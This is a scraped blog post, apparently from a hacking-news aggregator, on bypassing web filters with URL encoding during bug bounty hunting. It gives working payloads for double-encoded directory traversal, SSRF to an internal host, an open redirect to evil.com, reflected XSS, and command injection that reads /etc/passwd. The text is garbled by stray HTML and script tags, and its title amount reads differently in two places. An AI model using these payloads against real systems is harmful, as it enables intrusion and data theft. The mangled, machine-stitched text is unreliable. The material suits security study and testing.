This Simple URL Encoding Made me 0,000 in Bounties

By /

Listen to this Post

URL encoding, also known as percent-encoding, is a technique used to encode special characters in URLs to ensure safe transmission over the internet. This method replaces unsafe ASCII characters with a “%” followed by two hexadecimal digits. Attackers and bug bounty hunters often manipulate URL encoding to bypass security filters, leading to critical vulnerabilities like SSRF, XSS, and open redirects.

You Should Know:

1. Common URL Encoding Techniques

  • Space: `%20`
    – Double Quote ("): `%22`
    – Single Quote ('): `%27`
    – Less Than (<): `%3C`
    – Greater Than (>): `%3E`
    – Forward Slash (/): `%2F`
    – Backslash (\): `%5C`

2. Using URL Encoding in Bug Bounty Hunting

Many web applications fail to properly decode URLs before processing them, leading to vulnerabilities.

Example: Bypassing Filters with Double Encoding

Suppose a filter blocks `../` to prevent directory traversal. You can bypass it using:

%252E%252E%252F (Double-encoded ../)

Example: SSRF via URL Encoding

A vulnerable endpoint might accept:

http://internal-server/admin

But if filtered, try:

http://%69%6E%74%65%72%6E%61%6C%2D%73%65%72%76%65%72/admin

(Hex-encoded “internal-server”)

3. Testing for Open Redirects

Some sites check if a URL starts with `https://trusted.com`. Bypass with:

https://trusted.com%2F%3Fnext%3Dhttps://evil.com

4. XSS via Improper URL Decoding

If a reflected parameter is inserted into JavaScript without proper sanitization:

https://example.com/search?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E

5. Command Injection in Linux/Windows

URL-encoded payloads can execute commands if processed unsafely:

Linux Command Injection

curl "http://victim.com/api?cmd=%63%61%74%20%2F%65%74%63%2F%70%61%73%73%77%64"

(Decodes to `cat /etc/passwd)</h2>
<h2 style="color:yellow;">Windows Command Injection</h2>

ping%20%2Dn%201%20127.0.0.1

<h2 style="color:yellow;">(Decodes toping -n 1 127.0.0.1`)

6. Automating URL Encoding with Python

import urllib.parse
payload = "<script>alert(1)</script>"
encoded_payload = urllib.parse.quote(payload)
print(encoded_payload) # Output: %3Cscript%3Ealert%281%29%3C%2Fscript%3E

7. Decoding URLs for Analysis

Use `curl` or `echo` in Linux:

echo "%68%65%6C%6C%6F" | xxd -r -p # Output: hello

8. Browser DevTools for Manual Testing

  • Chrome/Firefox: Use `decodeURIComponent()` in the console:
    decodeURIComponent("%3Cscript%3E"); // Output: </li>
</ul>

<script>

    ### **9. OWASP Cheat Sheet Reference**

    For advanced techniques, refer to:

    [OWASP URL Encoding](https://owasp.org/www-community/attacks/URL_Encoding)

    ### **What Undercode Say**

    URL encoding is a powerful tool for both developers and hackers. While it ensures data integrity in web requests, improper handling can lead to severe security flaws. Always:
    – Validate and sanitize inputs.
    – Use multiple decoding layers if needed.
    – Test for double encoding in bug bounty programs.

    For penetration testers, mastering encoding techniques is crucial for uncovering hidden vulnerabilities.

    **Expected Output:**

    This Simple URL Encoding Made me $50,000 in Bounties 

URL encoding, also known as percent-encoding... [continued as above]

    **Relevant URL:**

    [youtube.com](https://youtube.com)

    References:

    Reported By: [Nahamsec This](https://www.linkedin.com/posts/nahamsec_this-simple-url-encoding-made-me-50000-activity-7309956699941998592-gQ7G) – Hackers Feeds
    Extra Hub: Undercode MoN
    Basic Verification: Pass ✅

    Join Our Cyber World:

    [💬 Whatsapp](https://undercode.help/whatsapp) | [💬 Telegram](https://t.me/UndercodeCommunity)Featured Image





Related Posts: